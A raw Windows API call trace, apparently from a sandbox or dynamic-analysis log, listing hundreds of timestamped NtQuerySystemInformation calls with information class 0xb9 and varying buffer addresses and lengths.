NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb60, Length=0x28, ResultLength=0x0) [0182.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecc0, Length=0x38, ResultLength=0x0) [0182.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febe0, Length=0x28, ResultLength=0x0) [0182.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febe0, Length=0x28, ResultLength=0x0) [0182.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea80, Length=0x20, ResultLength=0x0) [0182.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea00, Length=0x20, ResultLength=0x0) [0182.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea00, Length=0x20, ResultLength=0x0) [0182.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea00, Length=0x20, ResultLength=0x0) [0182.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecc0, Length=0x38, ResultLength=0x0) [0182.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecc0, Length=0x38, ResultLength=0x0) [0182.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb40, Length=0x20, ResultLength=0x0) [0182.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fead0, Length=0x20, ResultLength=0x0) [0182.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fead0, Length=0x20, ResultLength=0x0) [0182.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feda0, Length=0x58, ResultLength=0x0) [0182.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecc0, Length=0x38, ResultLength=0x0) [0182.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feaf0, Length=0x28, ResultLength=0x0) [0182.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feaf0, Length=0x28, ResultLength=0x0) [0182.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feaf0, Length=0x28, ResultLength=0x0) [0182.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feaf0, Length=0x28, ResultLength=0x0) [0182.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb60, Length=0x28, ResultLength=0x0) [0182.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecc0, Length=0x38, ResultLength=0x0) [0182.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febe0, Length=0x28, ResultLength=0x0) [0182.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febe0, Length=0x28, ResultLength=0x0) [0182.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecc0, Length=0x38, ResultLength=0x0) [0182.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb40, Length=0x20, ResultLength=0x0) [0182.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feac0, Length=0x20, ResultLength=0x0) [0182.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feac0, Length=0x20, ResultLength=0x0) [0182.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feac0, Length=0x20, ResultLength=0x0) [0182.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecc0, Length=0x38, ResultLength=0x0) [0182.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb40, Length=0x20, ResultLength=0x0) [0182.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fead0, Length=0x20, ResultLength=0x0) [0182.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fead0, Length=0x20, ResultLength=0x0) [0182.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feda0, Length=0x58, ResultLength=0x0) [0182.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec80, Length=0x38, ResultLength=0x0) [0182.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feac0, Length=0x28, ResultLength=0x0) [0182.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feac0, Length=0x28, ResultLength=0x0) [0182.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feac0, Length=0x28, ResultLength=0x0) [0182.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feac0, Length=0x28, ResultLength=0x0) [0182.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb30, Length=0x28, ResultLength=0x0) [0182.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec80, Length=0x38, ResultLength=0x0) [0182.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec80, Length=0x38, ResultLength=0x0) [0182.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febb0, Length=0x28, ResultLength=0x0) [0182.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febb0, Length=0x28, ResultLength=0x0) [0182.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec80, Length=0x38, ResultLength=0x0) [0182.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec80, Length=0x38, ResultLength=0x0) [0182.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea20, Length=0x20, ResultLength=0x0) [0182.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe9a0, Length=0x20, ResultLength=0x0) [0182.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe9a0, Length=0x20, ResultLength=0x0) [0182.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe9a0, Length=0x20, ResultLength=0x0) [0182.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febf0, Length=0x20, ResultLength=0x0) [0182.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec80, Length=0x38, ResultLength=0x0) [0182.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb10, Length=0x20, ResultLength=0x0) [0182.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea90, Length=0x20, ResultLength=0x0) [0182.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea90, Length=0x20, ResultLength=0x0) [0182.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea90, Length=0x20, ResultLength=0x0) [0182.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec80, Length=0x38, ResultLength=0x0) [0182.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb10, Length=0x20, ResultLength=0x0) [0182.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea90, Length=0x20, ResultLength=0x0) [0182.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea90, Length=0x20, ResultLength=0x0) [0182.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea90, Length=0x20, ResultLength=0x0) [0182.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec80, Length=0x38, ResultLength=0x0) [0182.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb10, Length=0x20, ResultLength=0x0) [0182.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feaa0, Length=0x20, ResultLength=0x0) [0182.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feaa0, Length=0x20, ResultLength=0x0) [0182.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff008, Length=0x50, ResultLength=0x0) [0182.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef30, Length=0x38, ResultLength=0x0) [0182.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed60, Length=0x28, ResultLength=0x0) [0182.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed60, Length=0x28, ResultLength=0x0) [0182.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed60, Length=0x28, ResultLength=0x0) [0182.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed60, Length=0x28, ResultLength=0x0) [0182.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedd0, Length=0x28, ResultLength=0x0) [0182.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef30, Length=0x38, ResultLength=0x0) [0182.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee50, Length=0x28, ResultLength=0x0) [0182.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee50, Length=0x28, ResultLength=0x0) [0182.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef30, Length=0x38, ResultLength=0x0) [0182.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedb0, Length=0x20, ResultLength=0x0) [0182.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed30, Length=0x20, ResultLength=0x0) [0182.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed30, Length=0x20, ResultLength=0x0) [0182.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed30, Length=0x20, ResultLength=0x0) [0182.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef30, Length=0x38, ResultLength=0x0) [0182.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedb0, Length=0x20, ResultLength=0x0) [0182.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed40, Length=0x20, ResultLength=0x0) [0182.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed40, Length=0x20, ResultLength=0x0) [0182.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feeb0, Length=0x50, ResultLength=0x0) [0182.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fede0, Length=0x38, ResultLength=0x0) [0182.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec10, Length=0x28, ResultLength=0x0) [0182.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.504] 